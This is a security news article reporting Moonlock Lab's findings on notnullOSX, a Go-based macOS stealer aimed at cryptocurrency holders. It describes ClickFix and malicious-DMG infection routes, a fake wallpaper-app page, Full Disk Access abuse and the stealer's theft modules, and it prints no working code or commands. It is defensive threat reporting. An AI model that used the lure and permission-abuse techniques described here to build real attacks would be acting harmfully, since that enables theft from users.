Hackers Exploit ClickFix and Malicious DMG Files to Deploy notnullOSX on macOS
A new macOS information-stealing malware, dubbed notnullOSX, has emerged, specifically targeting cryptocurrency holders with wallet balances exceeding $10,000. Crafted in the Go programming language, this malware employs dual attack vectors—ClickFix social engineering tactics and malicious DMG disk image files—to infiltrate Apple Mac systems stealthily. The operators behind notnullOSX meticulously select their victims through an affiliate panel before initiating an attack, ensuring a highly targeted approach.
Origins and Development
The genesis of notnullOSX traces back to 2022, attributed to a developer known as 0xFFF, who initially introduced a rudimentary macOS stealer on underground forums. Following a dramatic exit in 2023—allegedly due to a fabricated law enforcement tip orchestrated by a rival—0xFFF vanished, leaving subscribers without refunds. In August 2024, the same individual resurfaced under the alias alh1mik, issued an apology, and began accepting preorders for a new macOS stealer priced at $400 per month. By 2026, this offering had materialized into the sophisticated notnullOSX malware.
Targeted Deployment
Moonlock Lab researchers first detected notnullOSX on March 30, 2026, across regions including Vietnam, Taiwan, and Spain. Their analysis revealed the malware’s deliberate construction: before targeting an individual, operators must complete a submission form detailing the victim’s social media profiles, wallet address, and correspondence history. Notably, the malware enforces a minimum wallet threshold of $10,000, automatically rejecting submissions below this amount.
Infection Mechanisms
The infection process initiates with a counterfeit protected Google document displaying an encryption error, prompting the victim to undertake one of two actions—both leading to malware installation:
1. ClickFix Technique: The victim is instructed to open the Terminal and paste a base64-encoded command, which discreetly retrieves and executes a remote bash installer script.
2. Malicious DMG File: The victim downloads a DMG disk image containing a README file, an install script, and a Terminal shortcut, all designed to appear routine.
In both scenarios, the victim unwittingly installs the malware without triggering any security warnings.
Distribution Tactics
The malware’s distribution network is notably sophisticated. A fraudulent product page for a wallpaper application named WallSpace was established at wallpapermacos[.]com, complete with polished screenshots and a free download button. Additionally, a hijacked YouTube channel, dormant since 2015, promoted the fake app through a single video that amassed 50,000 views within two weeks, indicative of paid promotion or search engine optimization manipulation.
Technical Exploitation
notnullOSX exploits macOS’s Transparency, Consent, and Control (TCC) framework by guiding victims to manually grant Full Disk Access in System Settings. This single permission grants the malware access to all protected data categories without further prompts. The malware operates through a modular architecture, downloading separate binaries from its command-and-control server to perform specific data theft tasks. Confirmed modules include:
– iMessageGrab: Extracts iMessage conversations.
– AppleNotesGrab: Retrieves content from Apple Notes.
– CryptoWalletsGrab: Targets cryptocurrency wallet information.
– BrowserGrab: Collects browser data, including cookies and history.
– TelegramGrab: Accesses Telegram messages and data.
– CredsGrab: Harvests stored credentials.
– ReplaceApp: Particularly concerning, this module silently replaces legitimate hardware wallet applications, such as Ledger Live, with trojanized versions, compromising the security of cryptocurrency transactions.
Implications and Recommendations
The emergence of notnullOSX underscores the evolving sophistication of cyber threats targeting macOS users, particularly those involved in cryptocurrency. The malware’s dual attack vectors and targeted approach highlight the necessity for heightened vigilance and robust security practices.
Preventive Measures:
– Verify Sources: Only download applications and documents from trusted, official sources.
– Exercise Caution with Terminal Commands: Avoid executing commands from unverified sources, especially those instructing the use of Terminal or other system utilities.
– Monitor Permissions: Regularly review and manage application permissions, particularly those requesting Full Disk Access.
– Stay Informed: Keep abreast of emerging threats and adapt security practices accordingly.
By implementing these measures, users can significantly reduce the risk of falling victim to sophisticated malware campaigns like notnullOSX.
